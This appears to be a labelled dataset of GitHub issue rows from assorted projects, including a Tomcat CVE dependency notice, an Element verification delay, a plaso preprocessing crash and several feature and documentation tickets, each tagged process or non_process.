<p>Direct dependency fix Resolution (org.springframework.boot:spring-boot-starter-web): 2.3.10.RELEASE</p><p>Fix Resolution (org.apache.tomcat.embed:tomcat-embed-core): 9.0.44</p>
<p>Direct dependency fix Resolution (org.springframework.boot:spring-boot-starter-web): 2.3.10.RELEASE</p><p>Fix Resolution (org.apache.tomcat.embed:tomcat-embed-core): 9.0.44</p>
<p>Direct dependency fix Resolution (org.springframework.boot:spring-boot-starter-web): 2.3.10.RELEASE</p><p>Fix Resolution (org.apache.tomcat.embed:tomcat-embed-core): 9.0.44</p>
<p>Direct dependency fix Resolution (org.springframework.boot:spring-boot-starter-web): 2.3.10.RELEASE</p>
</p>
</details>
<p></p>
***
:rescue_worker_helmet: Automatic Remediation is available for this issue | non_process | cve high detected in multiple libraries cve high severity vulnerability vulnerable libraries tomcat embed core jar tomcat embed core jar tomcat embed core jar tomcat embed core jar tomcat embed core jar tomcat embed core jar core tomcat implementation library home page a href path to dependency file services elastic ip manager pom xml path to vulnerable library home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar dependency hierarchy spring boot starter web release jar root library spring boot starter tomcat release jar x tomcat embed core jar vulnerable library tomcat embed core jar core tomcat implementation library home page a href path to dependency file services network acl manager pom xml path to vulnerable library home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar dependency hierarchy spring boot starter web release jar root library spring boot starter tomcat release jar x tomcat embed core jar vulnerable library tomcat embed core jar core tomcat implementation library home page a href path to dependency file services security group manager pom xml path to vulnerable library home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar dependency hierarchy spring boot starter web release jar root library spring boot starter tomcat release jar x tomcat embed core jar vulnerable library tomcat embed core jar core tomcat implementation library home page a href path to dependency file services vpc manager pom xml path to vulnerable library home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar dependency hierarchy spring boot starter web release jar root library spring boot starter tomcat release jar x tomcat embed core jar vulnerable library tomcat embed core jar core tomcat implementation library home page a href path to dependency file services route manager pom xml path to vulnerable library home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar dependency hierarchy spring boot starter web release jar root library spring boot starter tomcat release jar x tomcat embed core jar vulnerable library found in base branch master vulnerability details apache tomcat to to and to did not properly validate incoming tls packets when tomcat was configured to use nio openssl or openssl for tls a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact none integrity impact none availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution org apache tomcat embed tomcat embed core direct dependency fix resolution org springframework boot spring boot starter web release fix resolution org apache tomcat embed tomcat embed core direct dependency fix resolution org springframework boot spring boot starter web release fix resolution org apache tomcat embed tomcat embed core direct dependency fix resolution org springframework boot spring boot starter web release fix resolution org apache tomcat embed tomcat embed core direct dependency fix resolution org springframework boot spring boot starter web release fix resolution org apache tomcat embed tomcat embed core direct dependency fix resolution org springframework boot spring boot starter web release rescue worker helmet automatic remediation is available for this issue | 0 |
70,297 | 23,108,090,820 | IssuesEvent | 2022-07-27 10:34:20 | vector-im/element-web | https://api.github.com/repos/vector-im/element-web | opened | Verification between Desktop <> Web takes a few minutes to show emoji | T-Defect | ### Steps to reproduce
1. From desktop, go to Settings -> Security & Privacy, then trigger the desktop session to be verified
2. Accept verification request from the web session
3. Start verification process
### Outcome
#### What did you expect?
Next dialogs are quick to load during the verification process
#### What happened instead?
At the point when the emoji should have been shown, the desktop session continued asking me to accept the verification request from another session, while the web session says it's waiting for the desktop session.
After ~5 minutes, the emoji dialogs popped up in both apps.
### Operating system
Arch Linux
### Application version
Element version: 1.10.0
### How did you install the app?
Flatpak
### Homeserver
_No response_
### Will you send logs?
Yes | 1.0 | Verification between Desktop <> Web takes a few minutes to show emoji - ### Steps to reproduce
1. From desktop, go to Settings -> Security & Privacy, then trigger the desktop session to be verified
2. Accept verification request from the web session
3. Start verification process
### Outcome
#### What did you expect?
Next dialogs are quick to load during the verification process
#### What happened instead?
At the point when the emoji should have been shown, the desktop session continued asking me to accept the verification request from another session, while the web session says it's waiting for the desktop session.
After ~5 minutes, the emoji dialogs popped up in both apps.
### Operating system
Arch Linux
### Application version
Element version: 1.10.0
### How did you install the app?
Flatpak
### Homeserver
_No response_
### Will you send logs?
Yes | non_process | verification between desktop web takes a few minutes to show emoji steps to reproduce from desktop go to settings security privacy then trigger the desktop session to be verified accept verification request from the web session start verification process outcome what did you expect next dialogs are quick to load during the verification process what happened instead at the point when the emoji should have been shown the desktop session continued asking me to accept the verification request from another session while the web session says it s waiting for the desktop session after minutes the emoji dialogs popped up in both apps operating system arch linux application version element version how did you install the app flatpak homeserver no response will you send logs yes | 0 |
13,841 | 3,778,718,196 | IssuesEvent | 2016-03-18 02:34:30 | NREL/EnergyPlus | https://api.github.com/repos/NREL/EnergyPlus | closed | Eng. Ref. calculation revisions for Fanger PMV (Ticket 9598) | Documentation Sources Priority S2 - Medium | Eng. Ref. does not include changes to the Fanger model based on ASHRAE 55 updates. See pg. 1195 of V8.1 Eng. Ref. and subroutine CalcThermalComfortFanger in ThermalComfort.cc
| 1.0 | Eng. Ref. calculation revisions for Fanger PMV (Ticket 9598) - Eng. Ref. does not include changes to the Fanger model based on ASHRAE 55 updates. See pg. 1195 of V8.1 Eng. Ref. and subroutine CalcThermalComfortFanger in ThermalComfort.cc
| non_process | eng ref calculation revisions for fanger pmv ticket eng ref does not include changes to the fanger model based on ashrae updates see pg of eng ref and subroutine calcthermalcomfortfanger in thermalcomfort cc | 0 |
462,888 | 13,255,770,503 | IssuesEvent | 2020-08-20 11:32:40 | dwyl/smart-home-security-system | https://api.github.com/repos/dwyl/smart-home-security-system | opened | Registering a device on connection errors | T1h bug priority-1 | Smart hub is set up to register devices when they first connect, however I've since changed some attributes which has broken this:
```
2020-08-20T11:23:15.965480+00:00 app[web.1]: 11:23:15.965 [error] an exception was raised:
2020-08-20T11:23:15.965481+00:00 app[web.1]: ** (ArgumentError) argument error
2020-08-20T11:23:15.965482+00:00 app[web.1]: :erlang.apply({:error, #Ecto.Changeset<action: :insert, changes: %{serial: "Toms-MacBook-Pro"}, errors: [feature_flags: {"can't be blank", [validation: :required]}], data: #SmartHomeAuth.Access.Door<>, valid?: false>}, :uuid, [])
```
I need to revisit the device creation logic | 1.0 | Registering a device on connection errors - Smart hub is set up to register devices when they first connect, however I've since changed some attributes which has broken this:
```
2020-08-20T11:23:15.965480+00:00 app[web.1]: 11:23:15.965 [error] an exception was raised:
2020-08-20T11:23:15.965481+00:00 app[web.1]: ** (ArgumentError) argument error
2020-08-20T11:23:15.965482+00:00 app[web.1]: :erlang.apply({:error, #Ecto.Changeset<action: :insert, changes: %{serial: "Toms-MacBook-Pro"}, errors: [feature_flags: {"can't be blank", [validation: :required]}], data: #SmartHomeAuth.Access.Door<>, valid?: false>}, :uuid, [])
```
I need to revisit the device creation logic | non_process | registering a device on connection errors smart hub is set up to register devices when they first connect however i ve since changed some attributes which has broken this app an exception was raised app argumenterror argument error app erlang apply error ecto changeset valid false uuid i need to revisit the device creation logic | 0 |
92,485 | 8,365,414,838 | IssuesEvent | 2018-10-04 04:59:24 | zcash/zcash | https://api.github.com/repos/zcash/zcash | opened | Update boost tests where necessary for any Sapling changes to RPC parameters | RPC interface Sapling testing | For example:
> In regards to BOOST_AUTO_TEST_CASE(rpc_z_listunspent_parameters), the parameters have not changed. We could add some lines to get a new sapling address and then test that we do not throw when we pass that in,
via https://github.com/zcash/zcash/pull/3510#issuecomment-426704906
| 1.0 | Update boost tests where necessary for any Sapling changes to RPC parameters - For example:
> In regards to BOOST_AUTO_TEST_CASE(rpc_z_listunspent_parameters), the parameters have not changed. We could add some lines to get a new sapling address and then test that we do not throw when we pass that in,
via https://github.com/zcash/zcash/pull/3510#issuecomment-426704906
| non_process | update boost tests where necessary for any sapling changes to rpc parameters for example in regards to boost auto test case rpc z listunspent parameters the parameters have not changed we could add some lines to get a new sapling address and then test that we do not throw when we pass that in via | 0 |
124,916 | 10,329,739,860 | IssuesEvent | 2019-09-02 12:59:20 | rust-lang/rust | https://api.github.com/repos/rust-lang/rust | closed | libtest output for common CI systems | A-libtest C-feature-request | It would be useful if `libtest` would write a file in a format supported by CI systems.
Based on [AppVeyor](https://www.appveyor.com/docs/running-tests/#uploading-xml-test-results) and [VSTS](https://docs.microsoft.com/en-us/vsts/pipelines/tasks/test/publish-test-results?view=vsts), it looks like `junit` or `xunit3` could be good choices. | 1.0 | libtest output for common CI systems - It would be useful if `libtest` would write a file in a format supported by CI systems.
Based on [AppVeyor](https://www.appveyor.com/docs/running-tests/#uploading-xml-test-results) and [VSTS](https://docs.microsoft.com/en-us/vsts/pipelines/tasks/test/publish-test-results?view=vsts), it looks like `junit` or `xunit3` could be good choices. | non_process | libtest output for common ci systems it would be useful if libtest would write a file in a format supported by ci systems based on and it looks like junit or could be good choices | 0 |
3,830 | 6,802,428,831 | IssuesEvent | 2017-11-02 20:10:30 | gratipay/inside.gratipay.com | https://api.github.com/repos/gratipay/inside.gratipay.com | closed | Limit Gratipay's copyright license in Terms of Service (TOS) | Governance & Process | Reticketed from https://github.com/gratipay/inside.gratipay.com/issues/204#issuecomment-102103817
> - Personally, I find using CC0 for Gratipay.com in §6.1 as a really nice touch and a fresh approach. I take it you do understand the implications of this, though.
> - Staying on the topic of copyright, in §7.1 the copyright license that Participant grants to Gratipay is relatively broad to what Gratipay actiually needs at the time. While §7.2 clarifies what this license permits Gratipay to do, I would welcome a provision where it explicitly stated for which purposes Gratipay may use it. | 1.0 | Limit Gratipay's copyright license in Terms of Service (TOS) - Reticketed from https://github.com/gratipay/inside.gratipay.com/issues/204#issuecomment-102103817
> - Personally, I find using CC0 for Gratipay.com in §6.1 as a really nice touch and a fresh approach. I take it you do understand the implications of this, though.
> - Staying on the topic of copyright, in §7.1 the copyright license that Participant grants to Gratipay is relatively broad to what Gratipay actiually needs at the time. While §7.2 clarifies what this license permits Gratipay to do, I would welcome a provision where it explicitly stated for which purposes Gratipay may use it. | process | limit gratipay s copyright license in terms of service tos reticketed from personally i find using for gratipay com in § as a really nice touch and a fresh approach i take it you do understand the implications of this though staying on the topic of copyright in § the copyright license that participant grants to gratipay is relatively broad to what gratipay actiually needs at the time while § clarifies what this license permits gratipay to do i would welcome a provision where it explicitly stated for which purposes gratipay may use it | 1 |
7,827 | 11,007,607,933 | IssuesEvent | 2019-12-04 08:53:22 | geneontology/go-ontology | https://api.github.com/repos/geneontology/go-ontology | opened | Obsolete modulation by symbiont of host transmembrane receptor-mediated cAMP signal transduction and children | multi-species process obsoletion | Dear all,
The proposal has been made to obsolete:
* GO:0075115 modulation by symbiont of host transmembrane receptor-mediated cAMP signal transduction
* GO:0075117 negative regulation by symbiont of host transmembrane receptor-mediated cAMP signal transduction
* GO:0075116 positive regulation by symbiont of host transmembrane receptor-mediated cAMP signal transduction
There are no annotations, no mappings to this term. This term is not present in any slims.
The reason for obsoletion is that there is no evidence that this process exists. The only example I am aware of of transmembrane receptor-mediated cAMP signal transduction is in Dictyotelium, and there is no symbiont known to interfere with this pathway.
Any comments can be added to the issue: https://github.com/geneontology/go-ontology/issues/.
We are opening a comment period for this proposed obsoletion. We’d like to proceed and obsolete this term on December 10th, 2019. Unless objections are received by December 10th, 2019, we will assume that you agree to this change.
Thanks, Pascale | 1.0 | Obsolete modulation by symbiont of host transmembrane receptor-mediated cAMP signal transduction and children - Dear all,
The proposal has been made to obsolete:
* GO:0075115 modulation by symbiont of host transmembrane receptor-mediated cAMP signal transduction
* GO:0075117 negative regulation by symbiont of host transmembrane receptor-mediated cAMP signal transduction
* GO:0075116 positive regulation by symbiont of host transmembrane receptor-mediated cAMP signal transduction
There are no annotations, no mappings to this term. This term is not present in any slims.
The reason for obsoletion is that there is no evidence that this process exists. The only example I am aware of of transmembrane receptor-mediated cAMP signal transduction is in Dictyotelium, and there is no symbiont known to interfere with this pathway.
Any comments can be added to the issue: https://github.com/geneontology/go-ontology/issues/.
We are opening a comment period for this proposed obsoletion. We’d like to proceed and obsolete this term on December 10th, 2019. Unless objections are received by December 10th, 2019, we will assume that you agree to this change.
Thanks, Pascale | process | obsolete modulation by symbiont of host transmembrane receptor mediated camp signal transduction and children dear all the proposal has been made to obsolete go modulation by symbiont of host transmembrane receptor mediated camp signal transduction go negative regulation by symbiont of host transmembrane receptor mediated camp signal transduction go positive regulation by symbiont of host transmembrane receptor mediated camp signal transduction there are no annotations no mappings to this term this term is not present in any slims the reason for obsoletion is that there is no evidence that this process exists the only example i am aware of of transmembrane receptor mediated camp signal transduction is in dictyotelium and there is no symbiont known to interfere with this pathway any comments can be added to the issue we are opening a comment period for this proposed obsoletion we’d like to proceed and obsolete this term on december unless objections are received by december we will assume that you agree to this change thanks pascale | 1 |
295,316 | 22,207,497,858 | IssuesEvent | 2022-06-07 16:01:15 | defenseunicorns/zarf-package-software-factory | https://api.github.com/repos/defenseunicorns/zarf-package-software-factory | closed | Define backup strategy for GitLab, Jenkins, Jira, Confluence, and Nexus | documentation enhancement stability | We need to define the backup strategy, starting with GitLab, Jenkins, Jira, Confluence, and Nexus. This will need some thought and investigation, and likely an ADR
Outcome of this issue should be new issues for setting up, documenting, and testing backup and restore for each of the above services
Notes:
- Our first early adopter that is driving a lot of the timelines right now plans to use RDS and S3 rather than Postgres Operator and Minio. If there are ways for us to save time by assuming RDS and S3 usage when defining the backup strategy that would help our first user out by accelerating the timeline.
- The long term plan for this package is that Minio will be provided as the object-storage solution and Postgres Operator the database solution, with the opportunity to switch to AWS S3 and RDS if the user wants to. This will also help with local development, by not making RDS and S3 a dependency on using this thing.
- Long term, we'd like the docs to read something like "Here's how to do backup and restore assuming you are running in an airgap, using Minio and Postgres Operator. If you're able to utilize cloud services here is an alternate guide on how to do backup and restore assuming the use of RDS and S3 wherever databases and s3 storage are used". | 1.0 | Define backup strategy for GitLab, Jenkins, Jira, Confluence, and Nexus - We need to define the backup strategy, starting with GitLab, Jenkins, Jira, Confluence, and Nexus. This will need some thought and investigation, and likely an ADR
Outcome of this issue should be new issues for setting up, documenting, and testing backup and restore for each of the above services
Notes:
- Our first early adopter that is driving a lot of the timelines right now plans to use RDS and S3 rather than Postgres Operator and Minio. If there are ways for us to save time by assuming RDS and S3 usage when defining the backup strategy that would help our first user out by accelerating the timeline.
- The long term plan for this package is that Minio will be provided as the object-storage solution and Postgres Operator the database solution, with the opportunity to switch to AWS S3 and RDS if the user wants to. This will also help with local development, by not making RDS and S3 a dependency on using this thing.
- Long term, we'd like the docs to read something like "Here's how to do backup and restore assuming you are running in an airgap, using Minio and Postgres Operator. If you're able to utilize cloud services here is an alternate guide on how to do backup and restore assuming the use of RDS and S3 wherever databases and s3 storage are used". | non_process | define backup strategy for gitlab jenkins jira confluence and nexus we need to define the backup strategy starting with gitlab jenkins jira confluence and nexus this will need some thought and investigation and likely an adr outcome of this issue should be new issues for setting up documenting and testing backup and restore for each of the above services notes our first early adopter that is driving a lot of the timelines right now plans to use rds and rather than postgres operator and minio if there are ways for us to save time by assuming rds and usage when defining the backup strategy that would help our first user out by accelerating the timeline the long term plan for this package is that minio will be provided as the object storage solution and postgres operator the database solution with the opportunity to switch to aws and rds if the user wants to this will also help with local development by not making rds and a dependency on using this thing long term we d like the docs to read something like here s how to do backup and restore assuming you are running in an airgap using minio and postgres operator if you re able to utilize cloud services here is an alternate guide on how to do backup and restore assuming the use of rds and wherever databases and storage are used | 0 |
40,657 | 5,247,079,834 | IssuesEvent | 2017-02-01 11:45:57 | justarrived/just-match-web | https://api.github.com/repos/justarrived/just-match-web | closed | Redesign sidebar navigation and language selector | needs design | ## Old design
<img width="525" alt="screen shot 2016-12-20 at 15 28 56" src="https://cloud.githubusercontent.com/assets/922411/22022879/127e40b4-dcc4-11e6-9b92-da2b2ccb0297.png">
<img width="567" alt="screen shot 2016-12-20 at 15 27 40" src="https://cloud.githubusercontent.com/assets/922411/22022884/14b9e6d0-dcc4-11e6-83b1-e2e4adf4acaf.png">
| 1.0 | Redesign sidebar navigation and language selector - ## Old design
<img width="525" alt="screen shot 2016-12-20 at 15 28 56" src="https://cloud.githubusercontent.com/assets/922411/22022879/127e40b4-dcc4-11e6-9b92-da2b2ccb0297.png">
<img width="567" alt="screen shot 2016-12-20 at 15 27 40" src="https://cloud.githubusercontent.com/assets/922411/22022884/14b9e6d0-dcc4-11e6-83b1-e2e4adf4acaf.png">
| non_process | redesign sidebar navigation and language selector old design img width alt screen shot at src img width alt screen shot at src | 0 |
8,906 | 12,013,698,100 | IssuesEvent | 2020-04-10 09:29:27 | topcoder-platform/community-app | https://api.github.com/repos/topcoder-platform/community-app | opened | My Submissions page: Submissions not showing up | Dev Env submissions processor | Register to a design challenge and upload a submission (user :TCConnCopilot). Click on "View My Submissions" button. The recently uploaded submission is not displayed. The "View Submissions" button is also not available from the challenge details page. The user gets the submission confirmation email though. Please see video for reference.
https://drive.google.com/open?id=1LT2zMv4wkOff411FLPWW1HLAVMc5TuoP
The submission flow works fine for other users(dan_developer, tonyj etc). The issue happens when the user uploads the submission soon after registration.
| 1.0 | My Submissions page: Submissions not showing up - Register to a design challenge and upload a submission (user :TCConnCopilot). Click on "View My Submissions" button. The recently uploaded submission is not displayed. The "View Submissions" button is also not available from the challenge details page. The user gets the submission confirmation email though. Please see video for reference.
https://drive.google.com/open?id=1LT2zMv4wkOff411FLPWW1HLAVMc5TuoP
The submission flow works fine for other users(dan_developer, tonyj etc). The issue happens when the user uploads the submission soon after registration.
| process | my submissions page submissions not showing up register to a design challenge and upload a submission user tcconncopilot click on view my submissions button the recently uploaded submission is not displayed the view submissions button is also not available from the challenge details page the user gets the submission confirmation email though please see video for reference the submission flow works fine for other users dan developer tonyj etc the issue happens when the user uploads the submission soon after registration | 1 |
4,440 | 2,724,805,435 | IssuesEvent | 2015-04-14 19:53:36 | w3c/csvw | https://api.github.com/repos/w3c/csvw | closed | tests for public sector roles and salaries need updating | Test suite | @gkellogg - once again, fantastic (herculean) efforts with the test suite (PR #494 etc.).
I see that you have updated tests 034 and 035 (public sector roles & salaries - standard and minimal output) based on the changes in the csv2* doc. (many thanks)
Reading the [test run instructions][1] I see that the description/manifest for 034 and 035 (json, rdf and validation) need to be updated to take account of the moved files and the addition of the organization info... e.g.
```
Implicit
test034/senior-roles.csv test034/senior-roles.json test034/junior-roles.csv test034/junior-roles.json test034/gov.uk/professions.csv
```
changes to
```
Implicit
test034/senior-roles.csv test034/gov.uk/schema/senior-roles.json test034/junior-roles.csv test034/gov.uk/schema/junior-roles.json test034/gov.uk/data/organizations.csv test034/gov.uk/schema/organizations.json test034/gov.uk/data/professions.csv test034/gov.uk/schema/professions.json
```
Also, you should remove the `senior-roles.json` and `junior-roles.json` schema descriptions in the root directory for the test. (you already created a copy in `gov.uk/schema/` for each).
Didn't know how best you wanted to pursue these changes - hence raising an ISSUE rather than proposing a PR.
[1]:http://w3c.github.io/csvw/tests/ | 1.0 | tests for public sector roles and salaries need updating - @gkellogg - once again, fantastic (herculean) efforts with the test suite (PR #494 etc.).
I see that you have updated tests 034 and 035 (public sector roles & salaries - standard and minimal output) based on the changes in the csv2* doc. (many thanks)
Reading the [test run instructions][1] I see that the description/manifest for 034 and 035 (json, rdf and validation) need to be updated to take account of the moved files and the addition of the organization info... e.g.
```
Implicit
test034/senior-roles.csv test034/senior-roles.json test034/junior-roles.csv test034/junior-roles.json test034/gov.uk/professions.csv
```
changes to
```
Implicit
test034/senior-roles.csv test034/gov.uk/schema/senior-roles.json test034/junior-roles.csv test034/gov.uk/schema/junior-roles.json test034/gov.uk/data/organizations.csv test034/gov.uk/schema/organizations.json test034/gov.uk/data/professions.csv test034/gov.uk/schema/professions.json
```
Also, you should remove the `senior-roles.json` and `junior-roles.json` schema descriptions in the root directory for the test. (you already created a copy in `gov.uk/schema/` for each).
Didn't know how best you wanted to pursue these changes - hence raising an ISSUE rather than proposing a PR.
[1]:http://w3c.github.io/csvw/tests/ | non_process | tests for public sector roles and salaries need updating gkellogg once again fantastic herculean efforts with the test suite pr etc i see that you have updated tests and public sector roles salaries standard and minimal output based on the changes in the doc many thanks reading the i see that the description manifest for and json rdf and validation need to be updated to take account of the moved files and the addition of the organization info e g implicit senior roles csv senior roles json junior roles csv junior roles json gov uk professions csv changes to implicit senior roles csv gov uk schema senior roles json junior roles csv gov uk schema junior roles json gov uk data organizations csv gov uk schema organizations json gov uk data professions csv gov uk schema professions json also you should remove the senior roles json and junior roles json schema descriptions in the root directory for the test you already created a copy in gov uk schema for each didn t know how best you wanted to pursue these changes hence raising an issue rather than proposing a pr | 0 |
8,311 | 11,472,182,565 | IssuesEvent | 2020-02-09 15:50:29 | log2timeline/plaso | https://api.github.com/repos/log2timeline/plaso | closed | Preprocessing fails with WindowsHostnamePlugin | enhancement preprocessing | I got a Win2k image that fails to process with the following exception:
```shell
root@7e56f81805b2:/tmp# log2timeline.py -d --status_view linear test.plaso /tmp/image.vmdk
2020-02-06 09:45:05,255 [INFO] (MainProcess) PID:69 <data_location> Determined data location: /usr/share/plaso
2020-02-06 09:45:05,282 [INFO] (MainProcess) PID:69 <artifact_definitions> Determined artifact definitions path: /usr/share/artifacts
Checking availability and versions of dependencies.
[OK]
Source path : /tmp/image.vmdk
Source type : storage media image
Processing time : 00:00:00
Processing started.
Traceback (most recent call last):
File "/usr/bin/log2timeline.py", line 87, in <module>
if not Main():
File "/usr/bin/log2timeline.py", line 67, in Main
tool.ExtractEventsFromSources()
File "/usr/lib/python3/dist-packages/plaso/cli/log2timeline_tool.py", line 414, in ExtractEventsFromSources
self._PreprocessSources(extraction_engine)
File "/usr/lib/python3/dist-packages/plaso/cli/extraction_tool.py", line 218, in _PreprocessSources
resolver_context=self._resolver_context)
File "/usr/lib/python3/dist-packages/plaso/engine/engine.py", line 272, in PreprocessSources
self.knowledge_base)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/manager.py", line 328, in RunPlugins
artifacts_registry, knowledge_base, searcher)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/manager.py", line 196, in CollectFromWindowsRegistry
preprocess_plugin.Collect(knowledge_base, artifact_definition, searcher)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/interface.py", line 243, in Collect
self._ParseKey(knowledge_base, registry_key, value_name)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/interface.py", line 276, in _ParseKey
self._ParseValueData(knowledge_base, value_object)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/windows.py", line 266, in _ParseValueData
type(value_data), self.ARTIFACT_DEFINITION_NAME))
TypeError: unsupported format string passed to type.__format__
root@7e56f81805b2:/tmp# zcat log2timeline-20200206T095205.log.gz
2020-02-06 09:52:05,465 [DEBUG] (MainProcess) PID:101 <extraction_tool> Starting preprocessing.
2020-02-06 09:52:07,699 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxHostnameFile
2020-02-06 09:52:07,705 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxDistributionRelease
2020-02-06 09:52:07,714 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxIssueFile
2020-02-06 09:52:07,719 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxLSBRelease
2020-02-06 09:52:07,721 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxSystemdOSRelease
2020-02-06 09:52:07,727 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxLocalTime
2020-02-06 09:52:07,730 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxPasswdFile
2020-02-06 09:52:07,733 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSSystemConfigurationPreferencesPlistFile
2020-02-06 09:52:07,737 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSKeyboardLayoutPlistFile
2020-02-06 09:52:07,739 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSSystemVersionPlistFile
2020-02-06 09:52:07,742 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSLocalTime
2020-02-06 09:52:07,747 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSUserPasswordHashesPlistFiles
2020-02-06 09:52:07,755 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: WindowsEnvironmentVariableSystemRoot
2020-02-06 09:52:07,763 [DEBUG] (MainProcess) PID:101 <windows> setting environment variable: systemroot to: "\WINNT"
2020-02-06 09:52:07,769 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: WindowsEnvironmentVariableWinDir
2020-02-06 09:52:07,773 [DEBUG] (MainProcess) PID:101 <windows> setting environment variable: windir to: "\WINNT"
2020-02-06 09:52:07,778 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsEnvironmentVariableAllUsersProfile
2020-02-06 09:52:08,449 [DEBUG] (MainProcess) PID:101 <windows> setting environment variable: allusersprofile to: "All Users"
2020-02-06 09:52:08,451 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsAvailableTimeZones
2020-02-06 09:52:08,492 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsCodePage
2020-02-06 09:52:09,203 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsComputerName
root@7e56f81805b2:/tmp# log2timeline.py --version
plaso - log2timeline version 20200121
```
If it helps, `type(value_data)` at this point is `pyregf.multi_string`
Environment is the `log2timeline/plaso:20200121` docker image.
| 1.0 | Preprocessing fails with WindowsHostnamePlugin - I got a Win2k image that fails to process with the following exception:
```shell
root@7e56f81805b2:/tmp# log2timeline.py -d --status_view linear test.plaso /tmp/image.vmdk
2020-02-06 09:45:05,255 [INFO] (MainProcess) PID:69 <data_location> Determined data location: /usr/share/plaso
2020-02-06 09:45:05,282 [INFO] (MainProcess) PID:69 <artifact_definitions> Determined artifact definitions path: /usr/share/artifacts
Checking availability and versions of dependencies.
[OK]
Source path : /tmp/image.vmdk
Source type : storage media image
Processing time : 00:00:00
Processing started.
Traceback (most recent call last):
File "/usr/bin/log2timeline.py", line 87, in <module>
if not Main():
File "/usr/bin/log2timeline.py", line 67, in Main
tool.ExtractEventsFromSources()
File "/usr/lib/python3/dist-packages/plaso/cli/log2timeline_tool.py", line 414, in ExtractEventsFromSources
self._PreprocessSources(extraction_engine)
File "/usr/lib/python3/dist-packages/plaso/cli/extraction_tool.py", line 218, in _PreprocessSources
resolver_context=self._resolver_context)
File "/usr/lib/python3/dist-packages/plaso/engine/engine.py", line 272, in PreprocessSources
self.knowledge_base)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/manager.py", line 328, in RunPlugins
artifacts_registry, knowledge_base, searcher)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/manager.py", line 196, in CollectFromWindowsRegistry
preprocess_plugin.Collect(knowledge_base, artifact_definition, searcher)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/interface.py", line 243, in Collect
self._ParseKey(knowledge_base, registry_key, value_name)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/interface.py", line 276, in _ParseKey
self._ParseValueData(knowledge_base, value_object)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/windows.py", line 266, in _ParseValueData
type(value_data), self.ARTIFACT_DEFINITION_NAME))
TypeError: unsupported format string passed to type.__format__
root@7e56f81805b2:/tmp# zcat log2timeline-20200206T095205.log.gz
2020-02-06 09:52:05,465 [DEBUG] (MainProcess) PID:101 <extraction_tool> Starting preprocessing.
2020-02-06 09:52:07,699 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxHostnameFile
2020-02-06 09:52:07,705 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxDistributionRelease
2020-02-06 09:52:07,714 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxIssueFile
2020-02-06 09:52:07,719 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxLSBRelease
2020-02-06 09:52:07,721 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxSystemdOSRelease
2020-02-06 09:52:07,727 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxLocalTime
2020-02-06 09:52:07,730 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxPasswdFile
2020-02-06 09:52:07,733 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSSystemConfigurationPreferencesPlistFile
2020-02-06 09:52:07,737 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSKeyboardLayoutPlistFile
2020-02-06 09:52:07,739 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSSystemVersionPlistFile
